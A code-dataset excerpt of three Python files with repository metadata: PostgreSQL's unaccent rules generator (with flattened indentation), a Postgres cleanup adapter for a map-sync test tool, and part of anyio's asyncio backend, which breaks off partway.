] | 1 | 2019-11-19T03:46:25.000Z | 2019-11-19T04:56:17.000Z | contrib/unaccent/generate_unaccent_rules.py | g0djan/postgres | 741b1aaf61a3da10250555f827c0a7a2f9bc2822 | [
"PostgreSQL"
] | 1 | 2020-07-27T07:31:27.000Z | 2020-07-27T07:31:27.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This script builds unaccent.rules on standard output when given the
# contents of UnicodeData.txt [1] and Latin-ASCII.xml [2] given as
# arguments. Optionally includes ligature expansion and Unicode CLDR
# Latin-ASCII transliterator, enabled by default, this can be disabled
# with "--no-ligatures-expansion" command line option.
#
# The approach is to use the Unicode decomposition data to identify
# precomposed codepoints that are equivalent to a ligature of several
# letters, or a base letter with any number of diacritical marks.
#
# This approach handles most letters with diacritical marks and some
# ligatures. However, several characters (notably a majority of
# ligatures) don't have decomposition. To handle all these cases, one can
# use a standard Unicode transliterator available in Common Locale Data
# Repository (CLDR): Latin-ASCII. This transliterator associates Unicode
# characters to ASCII-range equivalent. Unless "--no-ligatures-expansion"
# option is enabled, the XML file of this transliterator [2] -- given as a
# command line argument -- will be parsed and used.
#
# Ideally you should use the latest release for each data set. For
# Latin-ASCII.xml, the latest data sets released can be browsed directly
# via [3]. Note that this script is compatible with at least release 29.
#
# [1] https://www.unicode.org/Public/8.0.0/ucd/UnicodeData.txt
# [2] https://raw.githubusercontent.com/unicode-org/cldr/release-34/common/transforms/Latin-ASCII.xml
# [3] https://github.com/unicode-org/cldr/tags
# BEGIN: Python 2/3 compatibility - remove when Python 2 compatibility dropped
# The approach is to be Python3 compatible with Python2 "backports".
from __future__ import print_function
from __future__ import unicode_literals
# END: Python 2/3 compatibility - remove when Python 2 compatibility dropped
import argparse
import codecs
import re
import sys
import xml.etree.ElementTree as ET
# BEGIN: Python 2/3 compatibility - remove when Python 2 compatibility dropped
if sys.version_info[0] <= 2:
# Encode stdout as UTF-8, so we can just print to it
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
# Map Python 2's chr to unichr
chr = unichr
# Python 2 and 3 compatible bytes call
def bytes(source, encoding='ascii', errors='strict'):
return source.encode(encoding=encoding, errors=errors)
else:
# END: Python 2/3 compatibility - remove when Python 2 compatibility dropped
sys.stdout = codecs.getwriter('utf8')(sys.stdout.buffer)
# The ranges of Unicode characters that we consider to be "plain letters".
# For now we are being conservative by including only Latin and Greek. This
# could be extended in future based on feedback from people with relevant
# language knowledge.
PLAIN_LETTER_RANGES = ((ord('a'), ord('z')), # Latin lower case
(ord('A'), ord('Z')), # Latin upper case
(0x03b1, 0x03c9), # GREEK SMALL LETTER ALPHA, GREEK SMALL LETTER OMEGA
(0x0391, 0x03a9)) # GREEK CAPITAL LETTER ALPHA, GREEK CAPITAL LETTER OMEGA
# Combining marks follow a "base" character, and result in a composite
# character. Example: "U&'A\0300'"produces "À".There are three types of
# combining marks: enclosing (Me), non-spacing combining (Mn), spacing
# combining (Mc). We identify the ranges of marks we feel safe removing.
# References:
# https://en.wikipedia.org/wiki/Combining_character
# https://www.unicode.org/charts/PDF/U0300.pdf
# https://www.unicode.org/charts/PDF/U20D0.pdf
COMBINING_MARK_RANGES = ((0x0300, 0x0362), # Mn: Accents, IPA
(0x20dd, 0x20E0), # Me: Symbols
(0x20e2, 0x20e4),) # Me: Screen, keycap, triangle
def print_record(codepoint, letter):
if letter:
output = chr(codepoint) + "\t" + letter
else:
output = chr(codepoint)
print(output)
class Codepoint:
def __init__(self, id, general_category, combining_ids):
self.id = id
self.general_category = general_category
self.combining_ids = combining_ids
def is_mark_to_remove(codepoint):
"""Return true if this is a combining mark to remove."""
if not is_mark(codepoint):
return False
for begin, end in COMBINING_MARK_RANGES:
if codepoint.id >= begin and codepoint.id <= end:
return True
return False
def is_plain_letter(codepoint):
"""Return true if codepoint represents a "plain letter"."""
for begin, end in PLAIN_LETTER_RANGES:
if codepoint.id >= begin and codepoint.id <= end:
return True
return False
def is_mark(codepoint):
"""Returns true for diacritical marks (combining codepoints)."""
return codepoint.general_category in ("Mn", "Me", "Mc")
def is_letter_with_marks(codepoint, table):
"""Returns true for letters combined with one or more marks."""
# See https://www.unicode.org/reports/tr44/tr44-14.html#General_Category_Values
# Letter may have no combining characters, in which case it has
# no marks.
if len(codepoint.combining_ids) == 1:
return False
# A letter without diacritical marks has none of them.
if any(is_mark(table[i]) for i in codepoint.combining_ids[1:]) is False:
return False
# Check if the base letter of this letter has marks.
codepoint_base = codepoint.combining_ids[0]
if (is_plain_letter(table[codepoint_base]) is False and \
is_letter_with_marks(table[codepoint_base], table) is False):
return False
return True
def is_letter(codepoint, table):
"""Return true for letter with or without diacritical marks."""
return is_plain_letter(codepoint) or is_letter_with_marks(codepoint, table)
def get_plain_letter(codepoint, table):
"""Return the base codepoint without marks. If this codepoint has more
than one combining character, do a recursive lookup on the table to
find out its plain base letter."""
if is_letter_with_marks(codepoint, table):
if len(table[codepoint.combining_ids[0]].combining_ids) > 1:
return get_plain_letter(table[codepoint.combining_ids[0]], table)
elif is_plain_letter(table[codepoint.combining_ids[0]]):
return table[codepoint.combining_ids[0]]
# Should not come here
assert(False)
elif is_plain_letter(codepoint):
return codepoint
# Should not come here
assert(False)
def is_ligature(codepoint, table):
"""Return true for letters combined with letters."""
return all(is_letter(table[i], table) for i in codepoint.combining_ids)
def get_plain_letters(codepoint, table):
"""Return a list of plain letters from a ligature."""
assert(is_ligature(codepoint, table))
return [get_plain_letter(table[id], table) for id in codepoint.combining_ids]
def parse_cldr_latin_ascii_transliterator(latinAsciiFilePath):
"""Parse the XML file and return a set of tuples (src, trg), where "src"
is the original character and "trg" the substitute."""
charactersSet = set()
# RegEx to parse rules
rulePattern = re.compile(r'^(?:(.)|(\\u[0-9a-fA-F]{4})) \u2192 (?:\'(.+)\'|(.+)) ;')
# construct tree from XML
transliterationTree = ET.parse(latinAsciiFilePath)
transliterationTreeRoot = transliterationTree.getroot()
# Fetch all the transliteration rules. Since release 29 of Latin-ASCII.xml
# all the transliteration rules are located in a single tRule block with
# all rules separated into separate lines.
blockRules = transliterationTreeRoot.findall("./transforms/transform/tRule")
assert(len(blockRules) == 1)
# Split the block of rules into one element per line.
rules = blockRules[0].text.splitlines()
# And finish the processing of each individual rule.
for rule in rules:
matches = rulePattern.search(rule)
# The regular expression capture four groups corresponding
# to the characters.
#
# Group 1: plain "src" char. Empty if group 2 is not.
# Group 2: unicode-escaped "src" char (e.g. "\u0110"). Empty if group 1 is not.
#
# Group 3: plain "trg" char. Empty if group 4 is not.
# Group 4: plain "trg" char between quotes. Empty if group 3 is not.
if matches is not None:
src = matches.group(1) if matches.group(1) is not None else bytes(matches.group(2), 'UTF-8').decode('unicode-escape')
trg = matches.group(3) if matches.group(3) is not None else matches.group(4)
# "'" and """ are escaped
trg = trg.replace("\\'", "'").replace('\\"', '"')
# the parser of unaccent only accepts non-whitespace characters
# for "src" and "trg" (see unaccent.c)
if not src.isspace() and not trg.isspace():
charactersSet.add((ord(src), trg))
return charactersSet
def special_cases():
"""Returns the special cases which are not handled by other methods"""
charactersSet = set()
# Cyrillic
charactersSet.add((0x0401, u"\u0415")) # CYRILLIC CAPITAL LETTER IO
charactersSet.add((0x0451, u"\u0435")) # CYRILLIC SMALL LETTER IO
# Symbols of "Letterlike Symbols" Unicode Block (U+2100 to U+214F)
charactersSet.add((0x2103, u"\xb0C")) # DEGREE CELSIUS
charactersSet.add((0x2109, u"\xb0F")) # DEGREE FAHRENHEIT
charactersSet.add((0x2117, "(P)")) # SOUND RECORDING COPYRIGHT
return charactersSet
def main(args):
# https://www.unicode.org/reports/tr44/tr44-14.html#Character_Decomposition_Mappings
decomposition_type_pattern = re.compile(" *<[^>]*> *")
table = {}
all = []
# unordered set for ensure uniqueness
charactersSet = set()
# read file UnicodeData.txt
with codecs.open(
args.unicodeDataFilePath, mode='r', encoding='UTF-8',
) as unicodeDataFile:
# read everything we need into memory
for line in unicodeDataFile:
fields = line.split(";")
if len(fields) > 5:
# https://www.unicode.org/reports/tr44/tr44-14.html#UnicodeData.txt
general_category = fields[2]
decomposition = fields[5]
decomposition = re.sub(decomposition_type_pattern, ' ', decomposition)
id = int(fields[0], 16)
combining_ids = [int(s, 16) for s in decomposition.split(" ") if s != ""]
codepoint = Codepoint(id, general_category, combining_ids)
table[id] = codepoint
all.append(codepoint)
# walk through all the codepoints looking for interesting mappings
for codepoint in all:
if codepoint.general_category.startswith('L') and \
len(codepoint.combining_ids) > 1:
if is_letter_with_marks(codepoint, table):
charactersSet.add((codepoint.id,
chr(get_plain_letter(codepoint, table).id)))
elif args.noLigaturesExpansion is False and is_ligature(codepoint, table):
charactersSet.add((codepoint.id,
"".join(chr(combining_codepoint.id)
for combining_codepoint \
in get_plain_letters(codepoint, table))))
elif is_mark_to_remove(codepoint):
charactersSet.add((codepoint.id, None))
# add CLDR Latin-ASCII characters
if not args.noLigaturesExpansion:
charactersSet |= parse_cldr_latin_ascii_transliterator(args.latinAsciiFilePath)
charactersSet |= special_cases()
# sort for more convenient display
charactersList = sorted(charactersSet, key=lambda characterPair: characterPair[0])
for characterPair in charactersList:
print_record(characterPair[0], characterPair[1])
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='This script builds unaccent.rules on standard output when given the contents of UnicodeData.txt and Latin-ASCII.xml given as arguments.')
parser.add_argument("--unicode-data-file", help="Path to formatted text file corresponding to UnicodeData.txt.", type=str, required=True, dest='unicodeDataFilePath')
parser.add_argument("--latin-ascii-file", help="Path to XML file from Unicode Common Locale Data Repository (CLDR) corresponding to Latin-ASCII transliterator (Latin-ASCII.xml).", type=str, dest='latinAsciiFilePath')
parser.add_argument("--no-ligatures-expansion", help="Do not expand ligatures and do not use Unicode CLDR Latin-ASCII transliterator. By default, this option is not enabled and \"--latin-ascii-file\" argument is required. If this option is enabled, \"--latin-ascii-file\" argument is optional and ignored.", action="store_true", dest='noLigaturesExpansion')
args = parser.parse_args()
if args.noLigaturesExpansion is False and args.latinAsciiFilePath is None:
sys.stderr.write('You must specify the path to Latin-ASCII transliterator file with \"--latin-ascii-file\" option or use \"--no-ligatures-expansion\" option. Use \"-h\" option for help.')
sys.exit(1)
main(args)
| 44.70068 | 361 | 0.68574 |
acfb4f689d5a1ec718d1e7d4ad0ac3cf648b3a28 | 8,981 | py | Python | sync_tester/postgres/postgres_adapter.py | MapColonies/automation-sync-test | bf1fcf1022a671af6b737d67706ba20af045e764 | [
"MIT"
] | null | null | null | sync_tester/postgres/postgres_adapter.py | MapColonies/automation-sync-test | bf1fcf1022a671af6b737d67706ba20af045e764 | [
"MIT"
] | null | null | null | sync_tester/postgres/postgres_adapter.py | MapColonies/automation-sync-test | bf1fcf1022a671af6b737d67706ba20af045e764 | [
"MIT"
] | null | null | null | """
This module wrapping and provide easy access client for ingestion-sync functionality on postgres
"""
import logging
from sync_tester.configuration import config
from mc_automation_tools import postgres
_log = logging.getLogger('sync_tester.postgres.postgres_adapter')
class PostgresHandler:
def __init__(self, pg_credential):
self.__end_point_url = pg_credential.pg_entrypoint_url
self.__port = pg_credential.pg_port
self.__user = pg_credential.pg_user
self.__password = pg_credential.pg_pass
self.__job_task_db = pg_credential.pg_job_task_db
self.__pycsw_records_db = pg_credential.pg_pycsw_record_db
self.__mapproxy_config_db = pg_credential.pg_mapproxy_db
self.__agent_db = pg_credential.pg_agent_db
self.__mapproxy_config_table = 'config'
@property
def get_class_params(self):
params = {
'__end_point_url': self.__end_point_url,
'__port': self.__port,
'__job_task_db': self.__job_task_db,
'__pycsw_records_db': self.__pycsw_records_db,
'__mapproxy_config_db': self.__mapproxy_config_db,
'__agent_db': self.__agent_db,
'__mapproxy_config_table': self.__mapproxy_config_table
}
return params
# ============================================== jobs & task =======================================================
def get_current_job_id(self, product_id, product_version):
"""
This query return the latest job id, based on creationTime on db, __user provide product id and product version
:param product_id: resource id
:param product_version: layer version
:return: str [job id[
"""
client = postgres.PGClass(self.__end_point_url, self.__job_task_db, self.__user, self.__password, self.__port)
keys_values = {'resourceId': product_id, 'version': product_version}
res = client.get_rows_by_keys('Job', keys_values, order_key='creationTime', order_desc=True)
latest_job_id = res[0][0]
_log.info(f'Received current job id: [{latest_job_id}], from date: {res[0][6]}')
return latest_job_id
def get_job_by_id(self, job_id):
"""
This method return job by providing id (jobId)
:param job_id: id of relevant job
:return: dict of job data
"""
client = postgres.PGClass(self.__end_point_url, self.__job_task_db, self.__user, self.__password, self.__port)
res = client.get_rows_by_keys('Job', {'id': job_id}, return_as_dict=True)
return res[0]
def get_tasks_by_job(self, job_id):
"""
This method return list of tasks [raws] by provide job id [jobId]
:param job_id: id of relevant job
:return: dict of job data
"""
client = postgres.PGClass(self.__end_point_url, self.__job_task_db, self.__user, self.__password, self.__port)
res = client.get_rows_by_keys('Task', {'jobId': job_id}, return_as_dict=True)
return res
def clean_layer_history(self, job_id):
"""
This method will delete record of job on agent db -> in case __user want ingest same layer again from watch dir
:param job_id:id of relevant job
:return:
"""
deletion_command = f"""DELETE FROM "layer_history" WHERE "layerId"='{job_id}';"""
client = postgres.PGClass(self.__end_point_url, self.__agent_db, self.__user, self.__password, self.__port)
try:
client.command_execute([deletion_command])
_log.info(f'Cleaned up successfully (layer_history) - from [{self.__agent_db}] , job: [{job_id}]')
return {'status': "OK", 'message': f'deleted ok {job_id}'}
except Exception as e:
return {'status': "Failed", 'message': f'deleted Failed: [{str(e)}]'}
def clean_job_task(self, job_id):
"""
This method will delete record of job on job task db [job manager db] -> deletion of job on Jobs table
and related tasks on Tasks table
:param job_id: id of relevant job
:return: dict -> {'status': Bool, 'message': str'}
"""
deletion_command = f"""DELETE FROM "Task" WHERE "jobId"='{job_id}';DELETE FROM "Job" WHERE "id"='{job_id}';"""
client = postgres.PGClass(self.__end_point_url, self.__job_task_db, self.__user, self.__password, self.__port)
try:
client.command_execute([deletion_command])
_log.info(f'Cleaned up successfully (job + task)- [{self.__job_task_db}] job: [{job_id}]')
return {'status': "OK", 'message': f'deleted ok {job_id}'}
except Exception as e:
return {'status': "Failed", 'message': f'deleted Failed: [{str(e)}]'}
# ========================================== catalog - pycsw =======================================================
def clean_pycsw_record(self, product_id):
"""
This method will delete record of layer on pycsw db -> its unique record
:param product_id: layer id -> resourceId
:return: dict -> {'status': Bool, 'message': str'}
"""
deletion_command = f"""DELETE FROM "records" WHERE "product_id"='{product_id}'"""
client = postgres.PGClass(self.__end_point_url, self.__pycsw_records_db, self.__user, self.__password,
self.__port)
try:
client.command_execute([deletion_command])
_log.info(
f'Cleaned up successfully (record pycsw) - from [{self.__pycsw_records_db}] , records: [{product_id}]')
return {'status': "OK", 'message': f'deleted ok {product_id}'}
except Exception as e:
return {'status': "Failed", 'message': f'deleted Failed: [{str(e)}]'}
# =============================================== mapproxy =========================================================
def get_mapproxy_config(self):
"""
This method will return current configuration of layer on mapproxy config db
:return: dict -> json
"""
client = postgres.PGClass(self.__end_point_url, self.__mapproxy_config_db, self.__user, self.__password,
self.__port)
try:
res = client.get_column_by_name(table_name='config', column_name="data")[0]
_log.info(f'got json-config ok')
return {'status': "OK", 'message': res}
except Exception as e:
return {'status': "Failed", 'message': f'Failed get json-config: [{str(e)}]'}
def get_mapproxy_configs(self):
"""
This will return all mapproxy configuration exists by last creation chronology
:return: list of dicts
"""
client = postgres.PGClass(self.__end_point_url, self.__mapproxy_config_db, self.__user, self.__password,
self.__port)
res = client.get_rows_by_order(table_name=self.__mapproxy_config_table, order_key='updated_time',
order_desc=True,
return_as_dict=True)
_log.info(f'Received {len(res)} of mapproxy config files')
return res
def delete_config_mapproxy(self, id, value):
"""
This method will delete entire row on mapproxy
:param id: id of specific configuration
:param value: layer id on mapproxy config
:param value: dict -> json
"""
client = postgres.PGClass(self.__end_point_url, self.__mapproxy_config_db, self.__user, self.__password,
self.__port)
try:
res = client.delete_row_by_id(self.__mapproxy_config_table, id, value)
_log.info(f'delete mapproxy config with id [{id}] successfully')
return {'status': "OK", 'message': res}
except Exception as e:
return {'status': "Failed", 'message': f'Failed on deletion json-config: [{str(e)}]'}
def delete_pycsw_record(product_id, value, db_name=config.PG_PYCSW_RECORD_DB_CORE_A, table_name='records'):
"""
This method will delete entire row on mapproxy
:param product_id: id of layer as product_id
:param value: The product_id
:param db_name: name of db
:param table_name: name of table
"""
client = postgres.PGClass(config.PG_HOST, db_name, config.PG_USER_CORE_A, config.PG_PASS_CORE_A)
res = client.delete_row_by_id(table_name, product_id, value)
def delete_agent_path(layer_id, value, db_name=config.PG_AGENT_DB_CORE_A, table_name='layer_history'):
"""
This method will delete entire row on mapproxy
:param layer_id: represent the later unique ID
:param value: value of id
:param db_name: name of db
:param table_name: name of table
"""
client = postgres.PGClass(config.PG_HOST, db_name, config.PG_USER_CORE_A, config.PG_PASS_CORE_A)
res = client.delete_row_by_id(table_name, layer_id, value)
| 45.588832 | 120 | 0.619419 |
acfb4f68d6f7cb6e3f93d3b65d68a2b6a603ae28 | 42,775 | py | Python | src/anyio/_backends/_asyncio.py | sobolevn/anyio | 6b37d4112f71d5eb83dfec9c9758af392b37e1e6 | [
"MIT"
] | null | null | null | src/anyio/_backends/_asyncio.py | sobolevn/anyio | 6b37d4112f71d5eb83dfec9c9758af392b37e1e6 | [
"MIT"
] | null | null | null | src/anyio/_backends/_asyncio.py | sobolevn/anyio | 6b37d4112f71d5eb83dfec9c9758af392b37e1e6 | [
"MIT"
] | null | null | null | import asyncio
import concurrent.futures
import math
import socket
import sys
from collections import OrderedDict, deque
from concurrent.futures import Future
from dataclasses import dataclass
from functools import wraps
from inspect import isgenerator
from socket import AddressFamily, SocketKind, SocketType
from threading import Thread
from types import TracebackType
from typing import (
Callable, Set, Optional, Union, Tuple, cast, Coroutine, Any, Awaitable, TypeVar, Generator,
List, Dict, Sequence, Type, Deque)
from weakref import WeakKeyDictionary
from .. import abc, TaskInfo
from .._core._eventloop import threadlocals, claim_worker_thread
from .._core._exceptions import (
ExceptionGroup as BaseExceptionGroup, ClosedResourceError, BusyResourceError, WouldBlock,
BrokenResourceError, EndOfStream)
from .._core._sockets import GetAddrInfoReturnType, convert_ipv6_sockaddr
from .._core._synchronization import ResourceGuard
from ..abc.sockets import IPSockAddrType, UDPPacketType
if sys.version_info >= (3, 7):
from asyncio import create_task, get_running_loop, current_task, all_tasks, run as native_run
from contextlib import asynccontextmanager
else:
from async_generator import asynccontextmanager
_T = TypeVar('_T')
def native_run(main, *, debug=False):
# Snatched from Python 3.7
from asyncio import coroutines
from asyncio import events
from asyncio import tasks
def _cancel_all_tasks(loop):
to_cancel = all_tasks(loop)
if not to_cancel:
return
for task in to_cancel:
task.cancel()
loop.run_until_complete(
tasks.gather(*to_cancel, loop=loop, return_exceptions=True))
for task in to_cancel:
if task.cancelled():
continue
if task.exception() is not None:
loop.call_exception_handler({
'message': 'unhandled exception during asyncio.run() shutdown',
'exception': task.exception(),
'task': task,
})
if events._get_running_loop() is not None:
raise RuntimeError(
"asyncio.run() cannot be called from a running event loop")
if not coroutines.iscoroutine(main):
raise ValueError("a coroutine was expected, got {!r}".format(main))
loop = events.new_event_loop()
try:
events.set_event_loop(loop)
loop.set_debug(debug)
return loop.run_until_complete(main)
finally:
try:
_cancel_all_tasks(loop)
loop.run_until_complete(loop.shutdown_asyncgens())
finally:
events.set_event_loop(None)
loop.close()
def create_task(coro: Union[Generator[Any, None, _T], Awaitable[_T]], *, # type: ignore
name: Optional[str] = None) -> asyncio.Task:
return get_running_loop().create_task(coro)
def get_running_loop() -> asyncio.AbstractEventLoop:
loop = asyncio._get_running_loop()
if loop is not None:
return loop
else:
raise RuntimeError('no running event loop')
def all_tasks(loop: Optional[asyncio.AbstractEventLoop] = None) -> Set[asyncio.Task]:
"""Return a set of all tasks for the loop."""
from asyncio import Task
if loop is None:
loop = get_running_loop()
return {t for t in Task.all_tasks(loop) if not t.done()}
def current_task(loop: Optional[asyncio.AbstractEventLoop] = None) -> Optional[asyncio.Task]:
if loop is None:
loop = get_running_loop()
return asyncio.Task.current_task(loop)
T_Retval = TypeVar('T_Retval')
# Check whether there is native support for task names in asyncio (3.8+)
_native_task_names = hasattr(asyncio.Task, 'get_name')
def get_callable_name(func: Callable) -> str:
module = getattr(func, '__module__', None)
qualname = getattr(func, '__qualname__', None)
return '.'.join([x for x in (module, qualname) if x])
#
# Event loop
#
def _maybe_set_event_loop_policy(policy: Optional[asyncio.AbstractEventLoopPolicy],
use_uvloop: bool) -> None:
# On CPython, use uvloop when possible if no other policy has been given and if not
# explicitly disabled
if policy is None and use_uvloop and sys.implementation.name == 'cpython':
try:
import uvloop
except ImportError:
pass
else:
# Test for missing shutdown_default_executor() (uvloop 0.14.0 and earlier)
if (not hasattr(asyncio.AbstractEventLoop, 'shutdown_default_executor')
or hasattr(uvloop.loop.Loop, 'shutdown_default_executor')):
policy = uvloop.EventLoopPolicy()
if policy is not None:
asyncio.set_event_loop_policy(policy)
def run(func: Callable[..., T_Retval], *args, debug: bool = False, use_uvloop: bool = True,
policy: Optional[asyncio.AbstractEventLoopPolicy] = None) -> T_Retval:
@wraps(func)
async def wrapper():
task = current_task()
task_state = TaskState(None, get_callable_name(func), None)
_task_states[task] = task_state
if _native_task_names:
task.set_name(task_state.name)
try:
return await func(*args)
finally:
del _task_states[task]
_maybe_set_event_loop_policy(policy, use_uvloop)
return native_run(wrapper(), debug=debug)
#
# Miscellaneous
#
async def sleep(delay: float) -> None:
await checkpoint()
await asyncio.sleep(delay)
#
# Timeouts and cancellation
#
CancelledError = asyncio.CancelledError
class CancelScope(abc.CancelScope):
__slots__ = ('_deadline', '_shield', '_parent_scope', '_cancel_called', '_active',
'_timeout_task', '_tasks', '_host_task', '_timeout_expired')
def __init__(self, deadline: float = math.inf, shield: bool = False):
self._deadline = deadline
self._shield = shield
self._parent_scope: Optional[CancelScope] = None
self._cancel_called = False
self._active = False
self._timeout_task: Optional[asyncio.Task] = None
self._tasks: Set[asyncio.Task] = set()
self._host_task: Optional[asyncio.Task] = None
self._timeout_expired = False
async def __aenter__(self):
async def timeout():
await asyncio.sleep(self._deadline - get_running_loop().time())
self._timeout_expired = True
await self.cancel()
if self._active:
raise RuntimeError(
"Each CancelScope may only be used for a single 'async with' block"
)
self._host_task = current_task()
self._tasks.add(self._host_task)
try:
task_state = _task_states[self._host_task]
except KeyError:
task_name = self._host_task.get_name() if _native_task_names else None
task_state = TaskState(None, task_name, self)
_task_states[self._host_task] = task_state
else:
self._parent_scope = task_state.cancel_scope
task_state.cancel_scope = self
if self._deadline != math.inf:
if get_running_loop().time() >= self._deadline:
self._cancel_called = True
self._timeout_expired = True
else:
self._timeout_task = get_running_loop().create_task(timeout())
self._active = True
return self
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
self._active = False
if self._timeout_task:
self._timeout_task.cancel()
assert self._host_task is not None
self._tasks.remove(self._host_task)
host_task_state = _task_states.get(self._host_task)
if host_task_state is not None and host_task_state.cancel_scope is self:
host_task_state.cancel_scope = self._parent_scope
if exc_val is not None:
exceptions = exc_val.exceptions if isinstance(exc_val, ExceptionGroup) else [exc_val]
if all(isinstance(exc, CancelledError) for exc in exceptions):
if self._timeout_expired:
return True
elif not self._parent_cancelled():
# This scope was directly cancelled
return True
return None
async def _cancel(self):
# Deliver cancellation to directly contained tasks and nested cancel scopes
for task in self._tasks:
# Cancel the task directly, but only if it's blocked and isn't within a shielded scope
cancel_scope = _task_states[task].cancel_scope
if cancel_scope is self:
# Only deliver the cancellation if the task is already running (but not this task!)
try:
running = task._coro.cr_running
awaitable = task._coro.cr_await
except AttributeError:
running = task._coro.gi_running
awaitable = task._coro.gi_yieldfrom
if not running and awaitable is not None:
task.cancel()
elif not cancel_scope._shielded_to(self):
await cancel_scope._cancel()
def _shielded_to(self, parent: Optional['CancelScope']) -> bool:
# Check whether this task or any parent up to (but not including) the "parent" argument is
# shielded
cancel_scope: Optional[CancelScope] = self
while cancel_scope is not None and cancel_scope is not parent:
if cancel_scope._shield:
return True
else:
cancel_scope = cancel_scope._parent_scope
return False
def _parent_cancelled(self) -> bool:
# Check whether any parent has been cancelled
cancel_scope = self._parent_scope
while cancel_scope is not None and not cancel_scope._shield:
if cancel_scope._cancel_called:
return True
else:
cancel_scope = cancel_scope._parent_scope
return False
async def cancel(self) -> None:
if self._cancel_called:
return
self._cancel_called = True
await self._cancel()
@property
def deadline(self) -> float:
return self._deadline
@property
def cancel_called(self) -> bool:
return self._cancel_called
@property
def shield(self) -> bool:
return self._shield
async def checkpoint():
try:
cancel_scope = _task_states[current_task()].cancel_scope
except KeyError:
cancel_scope = None
while cancel_scope:
if cancel_scope.cancel_called:
raise CancelledError
elif cancel_scope.shield:
break
else:
cancel_scope = cancel_scope._parent_scope
await asyncio.sleep(0)
@asynccontextmanager
async def fail_after(delay: float, shield: bool):
deadline = get_running_loop().time() + delay
async with CancelScope(deadline, shield) as scope:
yield scope
if scope._timeout_expired:
raise TimeoutError
@asynccontextmanager
async def move_on_after(delay: float, shield: bool):
deadline = get_running_loop().time() + delay
async with CancelScope(deadline=deadline, shield=shield) as scope:
yield scope
async def current_effective_deadline():
deadline = math.inf
cancel_scope = _task_states[current_task()].cancel_scope
while cancel_scope:
deadline = min(deadline, cancel_scope.deadline)
if cancel_scope.shield:
break
else:
cancel_scope = cancel_scope._parent_scope
return deadline
async def current_time():
return get_running_loop().time()
#
# Task states
#
class TaskState:
"""
Encapsulates auxiliary task information that cannot be added to the Task instance itself
because there are no guarantees about its implementation.
"""
__slots__ = 'parent_id', 'name', 'cancel_scope'
def __init__(self, parent_id: Optional[int], name: Optional[str],
cancel_scope: Optional[CancelScope]):
self.parent_id = parent_id
self.name = name
self.cancel_scope = cancel_scope
_task_states = WeakKeyDictionary() # type: WeakKeyDictionary[asyncio.Task, TaskState]
#
# Task groups
#
class ExceptionGroup(BaseExceptionGroup):
def __init__(self, exceptions: Sequence[BaseException]):
super().__init__()
self.exceptions = exceptions
class TaskGroup(abc.TaskGroup):
__slots__ = 'cancel_scope', '_active', '_exceptions'
def __init__(self):
self.cancel_scope: CancelScope = CancelScope()
self._active = False
self._exceptions: List[BaseException] = []
async def __aenter__(self):
await self.cancel_scope.__aenter__()
self._active = True
return self
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
ignore_exception = await self.cancel_scope.__aexit__(exc_type, exc_val, exc_tb)
if exc_val is not None:
await self.cancel_scope.cancel()
if not ignore_exception:
self._exceptions.append(exc_val)
while self.cancel_scope._tasks:
try:
await asyncio.wait(self.cancel_scope._tasks)
except asyncio.CancelledError:
await self.cancel_scope.cancel()
self._active = False
if not self.cancel_scope._parent_cancelled():
exceptions = self._filter_cancellation_errors(self._exceptions)
else:
exceptions = self._exceptions
try:
if len(exceptions) > 1:
raise ExceptionGroup(exceptions)
elif exceptions and exceptions[0] is not exc_val:
raise exceptions[0]
except BaseException as exc:
# Clear the context here, as it can only be done in-flight.
# If the context is not cleared, it can result in recursive tracebacks (see #145).
exc.__context__ = None
raise
return ignore_exception
@staticmethod
def _filter_cancellation_errors(exceptions: Sequence[BaseException]) -> List[BaseException]:
filtered_exceptions: List[BaseException] = []
for exc in exceptions:
if isinstance(exc, ExceptionGroup):
exc.exceptions = TaskGroup._filter_cancellation_errors(exc.exceptions)
if exc.exceptions:
if len(exc.exceptions) > 1:
filtered_exceptions.append(exc)
else:
filtered_exceptions.append(exc.exceptions[0])
elif not isinstance(exc, CancelledError):
filtered_exceptions.append(exc)
return filtered_exceptions
async def _run_wrapped_task(self, func: Callable[..., Coroutine], args: tuple) -> None:
task = cast(asyncio.Task, current_task())
try:
await func(*args)
except BaseException as exc:
self._exceptions.append(exc)
await self.cancel_scope.cancel()
finally:
self.cancel_scope._tasks.remove(task)
del _task_states[task] # type: ignore
async def spawn(self, func: Callable[..., Coroutine], *args, name=None) -> None:
if not self._active:
raise RuntimeError('This task group is not active; no new tasks can be spawned.')
name = name or get_callable_name(func)
if _native_task_names is None:
task = create_task(self._run_wrapped_task(func, args), name=name) # type: ignore
else:
task = create_task(self._run_wrapped_task(func, args))
# Make the spawned task inherit the task group's cancel scope
_task_states[task] = TaskState(parent_id=id(current_task()), name=name,
cancel_scope=self.cancel_scope)
self.cancel_scope._tasks.add(task)
#
# Threads
#
_Retval_Queue_Type = Tuple[Optional[T_Retval], Optional[BaseException]]
async def run_sync_in_worker_thread(
func: Callable[..., T_Retval], *args, cancellable: bool = False,
limiter: Optional['CapacityLimiter'] = None) -> T_Retval:
def thread_worker():
try:
with claim_worker_thread('asyncio'):
threadlocals.loop = loop
result = func(*args)
except BaseException as exc:
if not loop.is_closed():
asyncio.run_coroutine_threadsafe(limiter.release_on_behalf_of(task), loop)
if not cancelled:
loop.call_soon_threadsafe(queue.put_nowait, (None, exc))
else:
if not loop.is_closed():
asyncio.run_coroutine_threadsafe(limiter.release_on_behalf_of(task), loop)
if not cancelled:
loop.call_soon_threadsafe(queue.put_nowait, (result, None))
await checkpoint()
loop = get_running_loop()
task = current_task()
queue: asyncio.Queue[_Retval_Queue_Type] = asyncio.Queue(1)
cancelled = False
limiter = limiter or _default_thread_limiter
await limiter.acquire_on_behalf_of(task)
thread = Thread(target=thread_worker, daemon=True)
thread.start()
async with CancelScope(shield=not cancellable):
try:
retval, exception = await queue.get()
finally:
cancelled = True
if exception is not None:
raise exception
else:
return cast(T_Retval, retval)
def run_async_from_thread(func: Callable[..., Coroutine[Any, Any, T_Retval]], *args) -> T_Retval:
f: concurrent.futures.Future[T_Retval] = asyncio.run_coroutine_threadsafe(
func(*args), threadlocals.loop)
return f.result()
